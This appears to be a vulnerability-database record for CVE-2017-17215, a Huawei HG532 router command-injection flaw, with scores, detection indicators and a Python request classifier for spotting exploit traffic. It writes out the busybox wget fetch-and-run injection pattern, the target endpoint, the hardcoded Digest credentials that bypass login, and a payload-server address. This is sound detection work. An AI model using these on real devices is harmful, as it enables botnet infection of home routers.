CVE-2017-17215
published 2018-03-20


Priority: P1 · 86 · high
CVSS 3.0: 8.8 (AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H)
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 78.61% (99.5th percentile)
Huawei HG532 with some customized versions has a remote code execution vulnerability. An authenticated attacker could send malicious packets to port 37215 to launch attacks. Successful exploit could lead to the remote execution of arbitrary code.

Affected (1 range)

Vendor: huawei_technologies_co_ltd
Product: hg532
Version range: (none listed)
Fixed in: (none listed)

Detection & IOCs (extracted from sources)

port: 37215
url: POST /ctrlt/DeviceUpgrade_1
command pattern: $(/bin/busybox wget -g %s -l /tmp/huawei -r /huawei; sh /tmp/huawei)$(echo HUAWEIUPNP)
  • CVE-2017-17215 exploit targets the Huawei HG532 SOAP endpoint /ctrlt/DeviceUpgrade_1 on port 37215 via HTTP POST with a crafted Authorization Digest header (username="dslf-config", realm="HuaweiHomeGateway") and a command-injection payload in the body using the pattern $(...)$(echo HUAWEIUPNP).
  • The string 'HUAWEIUPNP' (via echo HUAWEIUPNP) is a reliable network-level signature for CVE-2017-17215 exploit attempts; detect it in HTTP POST body traffic to port 37215.
  • Trend Micro IDS/IPS rule 1134287 'WEB Huawei Home Gateway SOAP Command Execution (CVE-2017-17215)' covers this exploit; use as a reference signature pattern.
  • Fortinet IPS signature 'Huawei.HG532.Remote.Code.Execution' covers CVE-2017-17215 exploitation attempts.
  • Yowai (Mirai variant) listens on port 6 for C2 commands; monitor for unexpected inbound/outbound connections on TCP port 6 from IoT devices.
  • Mirai variant (Campaign 1/Omni) uses XOR table key 0xBAADF00D and drops iptables rules to block further connections on certain ports after infection; look for iptables DROP rules added by a newly spawned process on IoT devices.
  • Botnet exploiting CVE-2017-17215 uses custom UPX packing with unique signatures; scan for UPX-packed ELF binaries with non-standard UPX headers on IoT devices.
  • The CVE-2017-17215 exploit requires the attacker to be authenticated (per NVD), but in practice Mirai/Bushido variants supply a hardcoded Digest Authorization header (username='dslf-config', realm='HuaweiHomeGateway') in the exploit payload, effectively bypassing the authentication requirement on default-configured devices.
  • The Mirai variant payload server at 178.62.227.13 switched from an open directory listing to hiding file listings on February 22, 2019, while continuing to serve files; direct URL enumeration may no longer work but direct file fetches remain active.
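The detection points above (port 37215, the /ctrlt/DeviceUpgrade_1 SOAP endpoint, the $(...)$(echo HUAWEIUPNP) injection envelope and the hardcoded dslf-config Digest header) combined into one request classifier, as an added example that is not part of this record. The HttpRequest structure and the sample traffic are constructed for illustration; the sample body is a placeholder, not a real payload.

```python
import re
from dataclasses import dataclass

# Indicators taken from the detection notes above.
TARGET_PORT = 37215
TARGET_PATH = "/ctrlt/DeviceUpgrade_1"
# Command-injection envelope used by the known payloads: $(...)$(echo HUAWEIUPNP)
INJECTION_RE = re.compile(r"\$\([^)]*\)\$\(echo HUAWEIUPNP\)")
# Hardcoded Digest credentials shipped by the Mirai/Bushido exploit modules.
DIGEST_RE = re.compile(r'username="dslf-config".*realm="HuaweiHomeGateway"')

@dataclass
class HttpRequest:  # minimal parsed-request shape (assumed, not a real library type)
    dst_port: int
    method: str
    path: str
    headers: dict
    body: str

def match_cve_2017_17215(req: HttpRequest) -> list:
    """Return the names of the indicators that fire for this request (empty = no match)."""
    hits = []
    if req.dst_port == TARGET_PORT:
        hits.append("port_37215")
    if req.method == "POST" and req.path == TARGET_PATH:
        hits.append("soap_upgrade_endpoint")
    if INJECTION_RE.search(req.body):
        hits.append("huaweiupnp_injection")
    auth = req.headers.get("Authorization", "")
    if auth.startswith("Digest") and DIGEST_RE.search(auth):
        hits.append("hardcoded_digest_creds")
    return hits

def is_exploit_attempt(req: HttpRequest) -> bool:
    """The injection envelope alone is decisive; the upgrade endpoint plus the
    hardcoded credentials is also treated as an attempt even without a payload."""
    hits = set(match_cve_2017_17215(req))
    return "huaweiupnp_injection" in hits or {"soap_upgrade_endpoint", "hardcoded_digest_creds"} <= hits

# Constructed sample traffic (not captured data).
SAMPLES = {
    "exploit": HttpRequest(37215, "POST", TARGET_PATH,
        {"Authorization": 'Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="x", uri="/ctrlt/DeviceUpgrade_1"'},
        "<NewStatusURL>$(echo placeholder)$(echo HUAWEIUPNP)</NewStatusURL>"),
    "benign_upgrade": HttpRequest(37215, "POST", TARGET_PATH,
        {"Authorization": 'Digest username="admin", realm="HuaweiHomeGateway"'},
        "<NewStatusURL>http://192.0.2.10/status</NewStatusURL>"),
    "other_port": HttpRequest(80, "GET", "/index.html", {}, ""),
}
```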

CVSS provenance

nvd v3.0: 8.8 HIGH, CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd v2.0: 6.5 MEDIUM, AV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck: 8.8 HIGH